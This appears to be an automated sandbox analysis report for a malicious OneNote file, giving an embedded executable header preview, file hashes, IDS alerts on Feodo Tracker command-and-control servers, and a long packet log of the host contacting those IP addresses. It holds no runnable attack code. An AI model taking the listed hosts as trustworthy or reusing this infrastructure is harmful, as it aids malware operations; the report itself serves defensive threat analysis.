                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:data
                                                                                              Entropy (8bit):6.730628431064467
                                                                                              TrID:
                                                                                              • Microsoft OneNote note (16024/2) 100.00%
                                                                                              File name:Insight_Medical_Publishing_3.one
                                                                                              File size:120428
                                                                                              MD5:0d8f675a79a32d286f8eccb2ff989c91
                                                                                              SHA1:e0796075d09841386c12f37503495c9624a3c393
                                                                                              SHA256:7ef31d3538810c895812e331db91f905693b99b682d062d9d0b4dab5df0da0a2
                                                                                              SHA512:d1d81b41e35469ed748fb96998cdbfdaeffd7de481dc12486bd383d1e1e602a24c44c5e0ff4c0a016f0a12afee0a5d36a91f1c64c504918652ee40273b96141a
                                                                                              SSDEEP:1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnXE:1BoC+tCYvSMVnte8ZP1Y6JU
                                                                                              TLSH:C3C33BF1A8025C0AE123C976B1FB661399D051ED42283B2BF87D507DD978A20D6DD8EF
                                                                                              File Content Preview:.R\{...M..Sx.).......i.E......&.................?......I........*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

                                                                                              File Icon

                                                                                              Icon Hash:d4dce0626664606c

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              192.168.2.366.228.32.314968670802404330 03/17/23-09:17:28.925917TCP2404330ET CNC Feodo Tracker Reported CnC Server TCP group 16496867080192.168.2.366.228.32.31
                                                                                              192.168.2.3104.168.155.1434969480802404302 03/17/23-09:18:01.076339TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2496948080192.168.2.3104.168.155.143
                                                                                              192.168.2.3182.162.143.56496874432404312 03/17/23-09:17:34.182038TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 749687443192.168.2.3182.162.143.56
                                                                                              192.168.2.391.121.146.474968480802404344 03/17/23-09:17:19.192203TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 23496848080192.168.2.391.121.146.47
                                                                                              192.168.2.3167.172.199.1654968980802404308 03/17/23-09:17:48.416747TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 5496898080192.168.2.3167.172.199.165

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 17, 2023 09:16:35.903984070 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:35.904050112 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:35.904140949 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:35.935425997 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:35.935475111 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:36.551140070 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:36.551393032 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:36.557358980 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:36.557415962 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:36.557888031 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:36.608803034 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:36.779211044 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:36.779283047 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.158073902 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.158145905 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.158165932 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.158256054 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.158298016 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.158320904 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.202626944 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.457853079 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.457876921 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.457962036 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.457998991 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458026886 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458039045 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458044052 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.458075047 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458103895 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.458115101 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458156109 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.458179951 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.458184958 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.458234072 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.758245945 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758268118 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758343935 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758510113 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.758533955 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758608103 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.758629084 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758707047 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.758722067 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758810043 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758877039 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.758889914 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.758935928 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.759017944 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:37.759037018 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:37.812072039 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060399055 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060420036 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060472012 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060570955 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060602903 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060621977 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060642958 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060646057 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060656071 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060662985 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060672998 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060704947 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060745001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060760021 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060776949 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060812950 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060832977 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060849905 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060857058 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060890913 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060905933 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060926914 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.060965061 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.060985088 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061007977 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061018944 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061058998 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061074972 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061094999 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061104059 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061120987 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061153889 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061197996 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061196089 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061213970 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061285973 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061321020 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061321020 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061343908 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061362982 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061363935 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061404943 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061422110 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.061448097 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.061481953 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.067372084 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.361330032 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.361689091 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.361789942 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.361789942 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.361826897 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.361886978 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.361898899 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.361915112 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362015963 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362015963 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362030029 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362188101 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362281084 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362315893 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362332106 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362500906 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362574100 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362581968 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362633944 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362709045 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362824917 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362890959 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.362914085 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362914085 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.362935066 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363054991 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363127947 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363126993 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363126993 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363173008 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363286018 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363363981 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363363981 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363368034 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363389969 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363465071 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363480091 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363526106 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363586903 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363636017 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363636017 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363648891 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363673925 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363694906 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363765001 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363778114 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363822937 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.363869905 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.363869905 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.364198923 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.421921968 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.421964884 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:16:38.422034979 CET49683443192.168.2.3203.26.41.131
                                                                                              Mar 17, 2023 09:16:38.422044992 CET44349683203.26.41.131192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.192203045 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.222104073 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.222409010 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.227174044 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.256474972 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276632071 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276680946 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.276835918 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.287417889 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:19.317715883 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:19.362380981 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.163307905 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.163410902 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:21.191144943 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:21.689898014 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:21.737715006 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.689871073 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.689913034 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.690076113 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.735851049 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.735912085 CET496848080192.168.2.391.121.146.47
                                                                                              Mar 17, 2023 09:17:24.763818979 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:24.763869047 CET80804968491.121.146.47192.168.2.3
                                                                                              Mar 17, 2023 09:17:28.925916910 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.026180983 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.026325941 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.037509918 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.141081095 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148432016 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148479939 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.148572922 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.157700062 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.258588076 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:29.264183998 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:29.406485081 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:30.216989040 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:30.269695997 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.217888117 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.217945099 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.218170881 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.218358994 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.218449116 CET496867080192.168.2.366.228.32.31
                                                                                              Mar 17, 2023 09:17:33.318165064 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:33.318198919 CET70804968666.228.32.31192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.182038069 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.182136059 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.182271004 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.183058977 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.183100939 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.978096962 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.978301048 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.985789061 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.985817909 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.986380100 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:34.987706900 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:34.987730026 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092010975 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092142105 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092259884 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092884064 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092909098 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:36.092940092 CET49687443192.168.2.3182.162.143.56
                                                                                              Mar 17, 2023 09:17:36.092974901 CET44349687182.162.143.56192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.171070099 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.398536921 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.399653912 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.400696039 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.627909899 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643374920 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643405914 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.643577099 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.647331953 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:40.875297070 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:40.884608984 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:41.151254892 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:42.176580906 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:42.223731995 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.176423073 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.176465034 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.176712990 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.493266106 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.493411064 CET4968880192.168.2.3187.63.160.88
                                                                                              Mar 17, 2023 09:17:45.720385075 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:45.720431089 CET8049688187.63.160.88192.168.2.3
                                                                                              Mar 17, 2023 09:17:48.416747093 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:48.585005999 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:49.099303007 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:49.266845942 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:49.771209955 CET496898080192.168.2.3167.172.199.165
                                                                                              Mar 17, 2023 09:17:49.939126015 CET808049689167.172.199.165192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.418833017 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.418896914 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.418972015 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.419821978 CET49690443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.419852018 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.454278946 CET44349690164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.455209970 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.455261946 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.455347061 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.456340075 CET49691443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.456363916 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.490653992 CET44349691164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.491842985 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.491914988 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.492007017 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.492810965 CET49692443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.492846012 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.530214071 CET44349692164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.532516003 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.532592058 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.532685995 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.533261061 CET49693443192.168.2.3164.90.222.65
                                                                                              Mar 17, 2023 09:17:55.533292055 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:17:55.568703890 CET44349693164.90.222.65192.168.2.3
                                                                                              Mar 17, 2023 09:18:01.076339006 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:01.240555048 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:01.740967989 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:01.909027100 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:02.430157900 CET496948080192.168.2.3104.168.155.143
                                                                                              Mar 17, 2023 09:18:02.595954895 CET808049694104.168.155.143192.168.2.3
                                                                                              Mar 17, 2023 09:18:09.420943975 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:09.625969887 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:10.132339001 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:10.337409973 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:10.851165056 CET496958080192.168.2.3163.44.196.120
                                                                                              Mar 17, 2023 09:18:11.056092978 CET808049695163.44.196.120192.168.2.3
                                                                                              Mar 17, 2023 09:18:16.426006079 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:19.430021048 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:25.461776018 CET496968080192.168.2.3160.16.142.56
                                                                                              Mar 17, 2023 09:18:32.609797955 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.609858990 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.609966040 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.610491037 CET49697443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.610502958 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.876173973 CET44349697159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.877259970 CET49698443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.877319098 CET44349698159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:32.877496958 CET49698443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.878015995 CET49698443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:32.878040075 CET44349698159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.137538910 CET44349698159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.139899969 CET49699443192.168.2.3159.89.202.34
